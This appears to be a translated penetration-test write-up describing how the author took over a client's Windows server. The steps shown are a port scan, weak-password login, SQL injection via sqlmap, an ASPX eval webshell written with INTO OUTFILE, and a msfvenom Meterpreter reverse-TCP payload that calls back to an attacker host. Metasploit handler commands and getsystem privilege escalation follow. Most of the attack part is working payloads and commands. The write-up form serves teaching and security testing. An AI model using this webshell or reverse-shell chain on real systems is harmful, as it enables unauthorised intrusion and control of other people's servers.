Title: Vulnerability combination takes shell

0x00 Introduction

When a penetration project was conducted, the customer only provided one IP. As a rookie, I began to sail far away.

0x01 Information Collection

Nmap scans the port and pays attention to scanning high-bit ports, which often leads to unexpected gains.

Weak password attempt to log in.

A brief summary.

0x03 Vulnerability Detection

Log in to the background test and found that SQL injection exists in both systems.

A vulnerability to download any file in the crocus system on port 8000 was also found.

It turned out to be a log download. Click to discover that there is an absolute path in the page.

OK! Collect the absolute paths.

The current idea is:

On the premise of an absolute path, combined with SQL injection, use SQLmap's -sql-shell to try to write a Trojan.

0x04 Vulnerability

Take a closer look at this absolute path. I heard that staring at it will have miraculous effects. (laugh)

I think I have seen WCMS4.0 somewhere.

That's right. It's port 12055, log in to the background

You can use SQL injection in the background to write shells.

The sql injection point is approximately in the search location.

Intercept the packet and save it as post.txt. Start injection using sqlmap.

There is injection, dba permissions, and absolute paths. The shell one-stop is ready.

0x05 Webshell

Start writing aspx to the Trojan.

select '%@ Page Language='Javascript'% %eval(Request.Item['pass']);%' INTO OUTFILE 'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx'

No problem, visit.

Nice!

Kitchen knife connection.

0x06 Control server

First collect the information about this server

The server runs on the intranet, and here you choose to use the msf horse to bounce the shell and forward it.

About how to build a metasploit on the external network. Recommended articles:

http://www.sqlsec.com/2018/03/cloud.html#more

Generate msf horse

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=2333 -f exe road.exexx.xx.xx.xx is a public network server

2333 is a public network port

Upload the generated msf horse to the broiler through a Chinese kitchen knife.

Metasploit on the external network starts to configure monitoring

use exploit/multi/handle

set payload

windows/x64/meterpreter/reverse_tcp

set lhost 127.0.0.1

run

Execute a few meterpreter commands simply

getuid Current permissions

getsystem to raise rights

run getgui -u